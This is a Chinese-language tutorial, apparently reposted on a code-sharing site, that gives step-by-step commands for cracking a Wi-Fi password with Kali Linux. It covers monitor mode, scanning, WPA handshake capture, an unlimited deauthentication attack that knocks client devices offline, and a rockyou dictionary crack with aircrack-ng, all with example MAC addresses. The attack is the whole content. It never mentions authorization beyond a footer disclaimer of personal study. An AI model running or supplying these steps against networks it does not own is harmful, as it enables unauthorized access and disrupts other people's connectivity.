利用KALI暴力破解WIFI密碼


0x01 准備工作

利用kali破解wifi密碼,需要在虛擬機里安裝kali系統,並購買一個支持監聽的外置USB網卡!

0x02 開始

插入usb網卡並查看

打開kali虛擬機,插入usb無線網卡,選擇連接kali虛擬機

打開終端輸入:

iwconfig

 

 

查看無線網卡

airmon-ng

  該命令列出了支持監控模式的無線網卡,如果沒有任何輸出,則表示無線網卡不支持監控模式。

記下Interface名稱,開啟網卡的監聽模式

airmon-ng start wlan0

 如果出現結果如下圖,說明還有其他網卡處於監聽狀態,需要先將其關閉

airmon-ng check kill

 

再次開啟監聽模式,並記下其Interface

airmon-ng start wlan0

 

 

掃描信號

掃描附近的wifi信號

airodump-ng wlan0mon

 找到自己的目標wifi后使用 Ctrl+c 中止

 

  •  BSSID  AP端的mac地址
  •  PWR         信號強度(絕對值越小,信號越強)
  •  Data         對應路由器的在線數據吞吐量,數值越大,數值上傳量越大
  •  CH            對應路由的頻道
  •  ESSID       對應路由器的名稱

抓取握手包

輸入命令:

airodump-ng -c 6 -w ./test --bssid 24:16:6D:21:D1:E0 wlan0mon
airodump-ng -c <AP信道> -w <抓取握手包后存放位置名稱> --bssid <AP的mac地址> <interface名稱>

 

 

 這里需要有設備與路由傳輸數據才可以。

解除認證攻擊

保持命令窗口處於運行狀態,再打開一個新的命令窗口,進行解除認證攻擊,即強制連接到目的wifi路由的設備重新連接。

aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon
aireplay-ng -<攻擊模式,這里使用持續攻擊(0)> [攻擊次數,0為無限攻擊] -a <AP端的MAC地址> -c <被攻擊設備的MAC地址> <interface名稱> 

 當下圖所示位置顯示 WPA hankshake  即成功抓到握手包,將兩個命令框都輸入 Ctrl + C 終止攻擊和握手抓包。

 

 

 

 關閉無線網卡監聽模式

airmon-ng stop wlan0mon

 0x03 使用字典暴力破解

kali自帶有一份無線wifi密碼字典,但是需要先解壓

gzip -d /usr/share/wordlists/rockyou.txt.gz

 爆破

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap
aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>

 爆破成功后,如圖區域會顯示 KEY FOUND![ 密碼 ]

 

 大功告成!!!

 

 
 
 
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM